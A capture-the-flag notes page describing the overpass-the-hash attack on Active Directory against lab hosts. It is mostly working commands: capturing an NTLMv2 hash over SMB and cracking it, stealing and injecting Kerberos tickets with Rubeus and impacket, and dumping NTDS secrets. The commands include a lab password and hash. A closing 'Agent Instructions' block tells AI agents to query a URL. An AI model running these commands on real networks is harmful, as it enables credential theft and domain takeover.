# Overpass-the-hash Attack ## Methodology To execute the overpass the hash attack, get **NTLM** and Password first, and get **Kerberos Tickets via NTLM hash** and **password**. * *See* [*NTLM Poisoning - Responder* ](/windows-linux-and-active-directory-ctf-notes/active-directory/init-ntlmv2-theft.md)*section.* * For SMB protocol, here is a quick way to grab Net-NTLM-v2 hash and crack it ```bash # Kali Kali> smbserver.py -smb2support smb . # Windows CMD> type null > hello.txt CMD> copy hello.txt \\10.10.14.107\smb # Kali vi hashes.txt # and copy and past it john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt # or hashcat hashes.txt /usr/share/wordlists/rockyou.txt ```
## Kerberos Tickets #### For current user without password, use Rebeus. {% code overflow="wrap" %} ```bash # Run the command to get TGT for curren user # Rubeus shows base64 format of Kerberos ticket. CMD> .\Rubeus.exe tgtdeleg /nowrap # @Kali # Copy ticket to a file vi kirbi.b64 # decode base64 file -> binary format used for mimikatz base64 -d kirbi.b64 > ticket.kirbi # Convert the kirbi to ccache for impacket and metasploit impacket-ticketConverter ticket.kirbi G0.ccache # Inject the ticket into memory export KRB5CCNAME=G0.ccache # This is the case of Machine certificate # Modify clock SKEW issue sudo ntpdate 10.129.228.120 # Validate if you can use the ticket cme smb g0.flight.htb -k --use-kcache # g0.flight.htb is the target machine # Grab all NTDS content with the ticket cme smb g0.flight.htb -k --use-kcache --ntds drsuapi # DirSync with ticket impacket-secretsdump -no-pass -k g0.flight.htb -just-dc-user Administrator ``` {% endcode %} #### For user with password or NTLM hash, you could use Impact tools. {% code overflow="wrap" %} ```bash #impact-getTGT impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip $RHOST impacket-getTGT ignite.local/yashika -hashes :64fbae31cc352fc26af97cbdef151e03 -dc-ip $RHOST # Inject the ticket into memory export KRB5CCNAME=d.klay.ccache # The rest of the attack is the same as above. ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/kerberos-attack/overpass-the-hash-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.